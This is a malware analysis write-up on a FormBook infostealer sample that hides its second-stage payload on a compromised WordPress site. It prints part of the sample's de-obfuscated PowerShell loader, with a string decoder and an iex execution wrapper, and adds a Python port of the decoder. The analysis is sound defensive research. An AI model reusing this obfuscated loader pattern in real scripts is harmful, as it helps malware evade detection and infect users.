FormBook Malware - The Uninvited Guest of WordPress
Introduction
Hey everyone 🙏, today we’ll be exploring FormBook, an infostealer malware 🤖 that has been circulating since 2016, offering its malicious services on hacking forums as Malware as a Service (MaaS). Recently, I stumbled upon a fresh sample named rCheq0004783.bat on Malware Bazaar, dated May 15, 2024. It’s obfuscated, but after some digging, it turns out to be just another FormBook variant, executed after multiple stages of de-obfuscation.
What’s interesting is how this sample hides one of its payloads on a vulnerable WordPress website. Seems like the malware found a new hideout. Sneaky? 🥸
Keep reading as I dig into the analysis, revealing FormBook’s newest tactics.
Analysis
Download the sample from: Malware Bazaar, VirusTotal
The sample is obfuscated and looks like total gibberish at first glance, except for the first line, which reveals the batch script executing PowerShell in hidden mode. See [Figure - FormBook First Stage].
Let’s try to de-obfuscate this mess. I’ll copy and paste the obfuscated script into a new file, adding line breaks to make it look cleaner. I attempted replacing all semicolons with \n characters, but the output wasn’t very clear because some of the obfuscated strings contain semicolons. With no other options left, I went through each line and corrected the syntax by hand. See the code snippet below.
$Konvolutter = 1;                       # Substring length: one character per step
$premonopolises='Su';
$premonopolises+='bstrin';
$premonopolises+='g';                   # builds the method name "Substring" piece by piece
Function printermanualer($Deferrals){   # string decoder, referred to as decode_str below
$Coadmires=$Deferrals.Length-$Konvolutter;
For($Imposante124=2;$Imposante124 -lt $Coadmires;$Imposante124+=3){
$Diskenspringerens+=$Deferrals.$premonopolises.Invoke( $Imposante124, $Konvolutter);   # keeps every third character, starting at index 2
}
$Diskenspringerens;
}
function Investeringsoversigterne($Entr){   # executes the decoded string; $Expecter resolves to iex
.($Expecter) ($Entr);
}
$Oreopithecus=printermanualer 'OcMEpoClzFei Gl lReaOm/M,5 ,.La0Ba Bo(AlW RiHinAfd ,oFrwZasAn eN .TAr P,1Cl0 H.Ev0 O;Bl NWFoi en A6 B4 H;Wi ,yx M6e,4 u;In grrG,v :.m1.o2On1Br. .0R,)Nu ,GFoeFucSuk.eost/ D2Sn0.l1Ek0 z0Bi1 ,0,y1 O rFEfiDrrSie.efA o UxA,/Sp1S 2.e1Pe.S,0Ou ';
$Havfiskers=printermanualer 'BeUOlsI eEir ,-RaA ,gL.eSpnFitGl ';
# ... (OMITTING FEW LINES)
# ... (OMITTING FEW LINES)
# ... (OMITTING FEW LINES)
$Afglatningers=268444;
$neatify=27864;
Investeringsoversigterne (printermanualer ' $ ngM,l SoTabobaL lI :S,SgryGolAdlSyeA,p .sQei Cs,a He= U TeGu,eT t B- .CFiodrn.ct MeSunHetUn C,$PlSFlnh oH,b.abSpeTrr ns,o ');
# ... (OMITTING FEW LINES)
Investeringsoversigterne (printermanualer 'An$BegHolDioW.b na dl ,:Aaa,alpalSkrA.oQuu unChd,a=mi$U,S .eIbl v efU,o,nrL a g,et.eeAfn.lsUn.UnsU,uS.bGas.otsor GiDenmig .(,n$.iAExfS,g,llSta UtBanCuiHynTrgTreShrIns,o,r $ NnDre SaBotPaiBdfB ySi)g. ');
Investeringsoversigterne $allround;
It’s better than before, but still not readable. Let’s decode this step by step. In the code snippet above, there are two functions: printermanualer and Investeringsoversigterne. The function printermanualer accepts a string input, performs some operations on it, and returns a string, so some decoding is clearly taking place inside it. Let’s refer to this function as decode_str; I will rename all occurrences of printermanualer to decode_str. The other function, Investeringsoversigterne, executes its input string using the iex keyword.
Let’s run the decode_str function in a PowerShell window to decode all the strings present in the sample. See [Figure - decode_str 1].
Using the decode_str function, I can now decode the gibberish strings found throughout the script. See [Figure - decode_str 2].
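As an added example (not code from the post or from the sample itself), the following Python port of printermanualer reproduces the decoding pass outside PowerShell; the decode_script helper, its regex and the one-line excerpt are my own additions built from the snippet above. The decoder depends purely on character positions, so a copy of the script in which runs of spaces were collapsed will decode to garbage; work from a byte-exact copy of the sample.

```python
import re

# Constants mirror the sample's printermanualer(): $Konvolutter = 1 is the
# Substring length, the loop starts at index 2, steps by 3, and keeps going
# only while index < Length - 1.
STRIDE = 3
OFFSET = 2
WIDTH = 1


def decode_str(s: str) -> str:
    """Python port of printermanualer(): keep every third character from index 2."""
    out = []
    i = OFFSET
    limit = len(s) - WIDTH          # $Coadmires = $Deferrals.Length - $Konvolutter
    while i < limit:
        out.append(s[i:i + WIDTH])  # $Deferrals.Substring($i, $Konvolutter)
        i += STRIDE
    # A character sitting at the very last index is never emitted; the sample
    # pads each literal with a trailing space, so nothing meaningful is lost.
    return "".join(out)


# Hypothetical helper (not in the sample): find every
#   printermanualer '<obfuscated>'
# call in the script text and decode its argument, like the bulk pass above.
CALL_RE = re.compile(r"printermanualer\s+'([^']*)'")


def decode_script(script: str) -> dict:
    """Map each obfuscated literal in script to its decoded text."""
    return {m.group(1): decode_str(m.group(1)) for m in CALL_RE.finditer(script)}


# Constructed excerpt: the $Havfiskers assignment copied from the snippet above.
EXCERPT = "$Havfiskers=printermanualer 'BeUOlsI eEir ,-RaA ,gL.eSpnFitGl ';"

if __name__ == "__main__":
    for obf, clear in decode_script(EXCERPT).items():
        print(repr(obf), "->", repr(clear))   # -> 'User-Agent'
```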
Decoding the first variable, $Oreopithecus, revealed a user-agent string. This is a clear indication that the script will perform HTTP communication, most likely to download additional payloads.
After decoding all the strings in the same manner, I discovered a URL that stores the second-stage payload for this malware. The URL points to a vulnerable WordPress website. See [Figure - WordPress URL].
Using PowerShell’s System.Net.WebClient, the malware downloads the contents of the WordPress URL. See [Figure - WebClient].
The downloaded file is cleaned in multiple steps, as shown in [Figure - Cleaning Nasard], before execution.
I have created a CyberChef recipe which takes the downloaded file as input and produces the cleaned second-stage payload. See [Figure - CyberChef Recipe].
Final Note
Alright, folks, there are a lot of FormBook malware analysis reports out there. My aim in this article was to shed light on how threat actors are abusing the never-ending supply of vulnerable WordPress websites.
In this case, the threat actor exploited a vulnerable WordPress plugin that allowed arbitrary file upload. Please refer to https://wpscan.com/vulnerability/a8350890-e6d4-4b04-a158-2b0ee3748e65/ for more information. They then used this WordPress website as a payload download service.